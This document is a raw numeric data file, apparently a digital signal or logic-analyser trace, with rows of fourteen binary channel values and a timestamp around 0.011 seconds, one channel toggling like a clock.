0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0822384e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0822404e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0822428e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0822452e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0822476e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0822500e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0822524e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0822552e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0822576e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0822604e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0822628e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0822652e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0822676e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0822700e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0822724e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0822752e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0822776e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0822804e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0822828e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0822852e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0822876e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0822900e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0822924e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0822952e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0822976e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0823004e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0823028e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0823052e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0823076e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0823100e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0823124e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0823152e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0823176e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0823204e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0823228e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0823252e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0823276e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0823300e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0823324e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0823352e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0823376e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0823404e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0823428e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0823452e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0823476e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0823500e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0823524e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0823548e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0823572e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,1,1.0948180e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,1.0948428e-02 1,1,0,0,0,0,0,0,0,0,0,1,0,1,1.0948456e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,1.0948484e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,1,1.0948812e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,1.0948836e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,1,1.0948860e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,1.0948884e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,1,1.0948908e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,1.0948932e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,1,1.0948960e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,1.0948984e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,1,1.0949036e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,1.0949060e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,1,1.0949064e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0949076e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,1.0949084e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0949108e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0949116e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0949132e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0949160e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0949164e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,1.0949212e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0949236e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0949244e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0949260e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0949284e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0949308e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0949332e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0949360e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0949384e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0949412e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0949436e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0949460e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0949484e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0949508e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0949532e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0949540e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,1.0949588e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0949612e-02 1,1,0,0,0,1,0,0,0,0,0,0,0,0,1.0949616e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0949620e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0949636e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0949660e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0949684e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0949708e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0949732e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0949760e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0949784e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0949812e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,1.0949836e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0949860e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0949868e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0949884e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0949908e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0949932e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0949960e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0949984e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0950012e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0950036e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0950060e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0950084e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0950108e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0950160e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0950184e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0950188e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,1.0950212e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0950236e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0950244e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0950260e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0950284e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0950308e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0950332e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0950360e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0950380e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0950404e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0950432e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0950456e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0950484e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0950508e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0950532e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0950556e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0950580e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0950604e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0950632e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0950656e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0950684e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,1.0950732e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0950756e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0950764e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0950780e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0950804e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0950832e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0950856e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0950884e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0950908e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0950912e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,1.0950956e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0950980e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0950988e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0951008e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0951032e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0951056e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0951084e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0951108e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0951132e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0951180e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0951208e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0951212e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,1.0951232e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0951256e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,1.0951308e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0951332e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0951340e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0951356e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0951380e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0951404e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0951432e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0951456e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0951484e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0951508e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0951532e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0951556e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0951580e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0951604e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0951632e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0951656e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0951684e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0951708e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0951732e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0951756e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0951780e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0951804e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0951832e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0951856e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0951884e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0951908e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0951932e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0951956e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0951980e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0952004e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0952032e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0952056e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0952084e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0952108e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0952132e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0952136e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,1.0952180e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0952208e-02 1,1,0,0,0,1,0,0,0,0,0,0,0,0,1.0952212e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0952216e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0952232e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0952256e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0952284e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0952308e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0952332e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0952356e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0952380e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0952404e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0952432e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0952456e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0952484e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0952508e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0952532e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0952556e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0952580e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0952604e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0952632e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0952656e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0952660e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,1.0952708e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0952732e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0952740e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0952756e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0952780e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0952804e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0952832e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0952856e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0952884e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0952912e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0952936e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0952964e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0952988e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0953012e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0953040e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0953044e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,1.0953092e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0953116e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0953124e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0953140e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0953164e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0953188e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0953212e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0953240e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0953264e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0953292e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0953316e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0953340e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0953364e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0953388e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0953412e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0953440e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0953464e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0953492e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0953516e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0953540e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0953564e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0953588e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0953612e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0953620e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,1.0953664e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0953692e-02 1,1,0,0,0,1,0,0,0,0,0,0,0,0,1.0953696e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0953700e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0953716e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0953740e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0953764e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0953788e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0953812e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0953836e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0953860e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0953884e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0953912e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0953936e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0953964e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0953988e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0954012e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0954036e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0954060e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0954084e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0954112e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0954136e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0954164e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0954188e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0954236e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0954260e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0954268e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,1.0954288e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0954312e-02 1,1,0,0,0,1,0,0,0,0,0,0,0,0,1.0954316e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0954320e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0954336e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0954364e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0954388e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0954412e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0954436e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0954460e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0954484e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0954512e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0954536e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0954564e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0954588e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0954612e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0954636e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0954660e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0954684e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0954712e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0954736e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0954764e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0954788e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0954812e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0954836e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0954860e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0954884e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0954912e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0954936e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0954964e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0954988e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0955012e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0955036e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0955060e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0955084e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0955112e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0955136e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0955164e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0955188e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0955212e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0955236e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0955260e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0955284e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0955312e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0955340e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0955364e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0955388e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0955412e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0955436e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0955460e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0955488e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0955512e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,1.1080148e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,1,1.1080376e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,1.1080380e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,1.1080396e-02 0,0,1,0,0,0,0,0,0,0,0,1,0,1,1.1080428e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,1.1080452e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,1,1.1080732e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,1.1080764e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,1,1.1080784e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,1.1080812e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,1,1.1080836e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,1.1080860e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,1,1.1080908e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,1.1080936e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,1,1.1080940e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,1,1.1080960e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,1,1.1080984e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,1.1080992e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,1,1.1081012e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,1.1081036e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1081044e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1081060e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1081084e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1081092e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,1.1081136e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1081160e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1081168e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1081188e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1081212e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1081260e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1081284e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1081336e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1081360e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1081412e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1081436e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1081460e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1081484e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1081508e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1081532e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1081540e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,1.1081588e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1081608e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1081620e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1081632e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1081660e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1081684e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1081708e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1081732e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1081756e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1081784e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1081808e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1081832e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1081860e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1081884e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1081908e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1081932e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1081956e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1081980e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1082008e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1082032e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1082060e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1082108e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1082132e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1082140e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,1.1082156e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1082180e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1082188e-02 